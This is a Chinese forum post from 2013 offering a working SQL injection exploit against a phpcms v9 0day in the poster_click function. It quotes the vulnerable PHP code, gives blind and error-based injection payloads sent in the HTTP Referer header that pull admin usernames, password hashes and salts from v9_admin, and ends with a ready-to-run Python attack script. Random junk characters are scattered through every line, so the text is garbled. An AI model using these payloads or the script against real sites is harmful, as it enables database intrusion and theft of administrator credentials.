有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
: ~$ I- I2 @) s' ]0 t& H' b" c' L3 O7 M g, X
问题函数\phpcms\modules\poster\index.php; v4 x6 x* t- D1 }" X
+ c8 a5 n* ]5 G1 Y
public function poster_click() {! L% G5 X4 s+ U' \( Z/ y! u0 p) y
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;& [- q, \6 c; R, x1 t6 u6 `$ o
$r = $this->db->get_one(array('id'=>$id));( U' X2 N, P; e* X
if (!is_array($r) && empty($r)) return false;
0 w; \7 t" ~$ i" I! w! b$ip_area = pc_base::load_sys_class('ip_area');
+ g4 ]; W, ~ v$ip = ip();; D& B: O& N; h' u V7 c& W+ e
$area = $ip_area->get($ip);
2 F5 [, m% k; M; B$username = param::get_cookie('username') ? param::get_cookie('username') : '';6 K! S* Z3 M( ^' j! i
if($id) {
9 w" W, U5 n% e5 `+ x# F0 m$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
+ ^: {5 o5 S9 t5 |$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));3 f+ T" U/ L ?, k* J. [' b
}
1 B- g' g) I& {+ w4 g: ?" I$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
2 L+ [' l q# q$setting = string2array($r['setting']);
) a& c6 M/ K0 v5 Dif (count($setting)==1) {
3 G9 ~9 U" m) J8 y6 Z$url = $setting['1']['linkurl'];7 t4 z3 k" v6 V7 Y
} else {
, G, Y( a; }6 x; s: z$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
) A j( o4 `- N+ ?9 f0 B}3 ^1 h# Y0 [- }5 M
header('Location: '.$url);: d) o) V# ~/ S4 `3 N( @
}
8 O2 N/ w9 K! y& b1 R& K) E
; P2 `' G A$ D9 n3 _5 k
- f4 j) f1 o+ S! H+ w+ c7 }' l* I5 Z% M( f% R
利用方式:
8 A0 j* A1 W# e4 p: G
- i; e* P6 o" g& K1 q" m1、可以采用盲注入的手法:
, f; l; l3 y& t# k8 [2 G* b' N! {7 B2 t1 t0 j" Q- o
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
+ r5 R! p+ u; G* F) a% P7 `1 S% {: i; ~% O! Q* s
通过返回页面,正常与否一个个猜解密码字段。
2 F" f, E/ Z; k
2 E% Y* `7 `/ X' M2、代码是花开写的,随手附上了:( k. H! A8 q o
; _8 ~7 v+ q. C3 N6 r$ Z) {) O1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#9 j( d2 g4 k. [; P' e. q0 H' o
4 E. m; H& U& L. s
此方法是爆错注入手法,原理自查。
. Q$ \; b/ ]2 s W1 l3 i- I# {
- A+ ~+ {2 H, J& U6 [ 8 h" r# q" d& V# v
1 x1 \) w: B f2 T# O0 U |利用程序:$ o# M# J: m( u# z& q
; ?3 L+ }6 r+ F% h: O) H& F/ {
#!/usr/bin/env python
8 Q3 B' _7 v% }) K6 Y N/ D7 Rimport httplib,sys,re' `* V1 p& R4 t p1 U
, F6 b0 c! f" G# d4 K" m
def attack():
8 K: X! c' Z; Lprint “Code by Pax.Mac Team conqu3r!”2 Q% F+ ]" g$ f7 J
print “Welcome to our zone!!!”4 J* b# G4 }$ G4 ]+ U7 S2 s
url=sys.argv[1]
6 h$ M/ S9 Y: S& t! [' o. z' zpaths=sys.argv[2]
8 d; ~/ |; U* Q9 Tconn = httplib.HTTPConnection(url)2 X: t+ d% `( E" n, B
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″," T6 W5 }% p2 [& Q2 i& H" ^0 C
“Accept”: “text/plain”,& F) D S. {) @( @$ t
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
1 X( s$ e9 c3 C4 ~conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)1 E; }+ H1 P% T# e; ]* H, k! ]4 b
r1 = conn.getresponse()2 y$ y! v9 |& T. Q8 I
datas=r1.read()* @) j/ u: [# A. e+ m, f; n
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
. P- P& \4 L2 G. Rprint datas[0]9 r# |+ w) T8 B. s* Z. D
conn.close()4 E& L1 ~8 {" i9 c) ?3 P9 `
if __name__==”__main__”:
* R, |# r% w; ^, r1 P6 hif len(sys.argv)<3:
+ h6 R* I0 T7 r/ Tprint “Code by Pax.Mac Team conqu3r”
" A" y' @3 B. L/ r& T7 qprint “Usgae:”
' N& X: b3 t4 w& A# [5 aprint “ phpcmsattack.py www.paxmac.org /”/ L# M1 ^3 i ?# I0 `* Y
print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”- v) W5 c5 |1 _9 L% |
sys.exit(1)
1 ~/ V( U& q& R+ j, l& xattack()6 C4 ~& w: M) \$ [7 a
/ e! K/ @7 [1 w% \ |
发表于 2013-1-11 21:01:00
收藏
支持
反对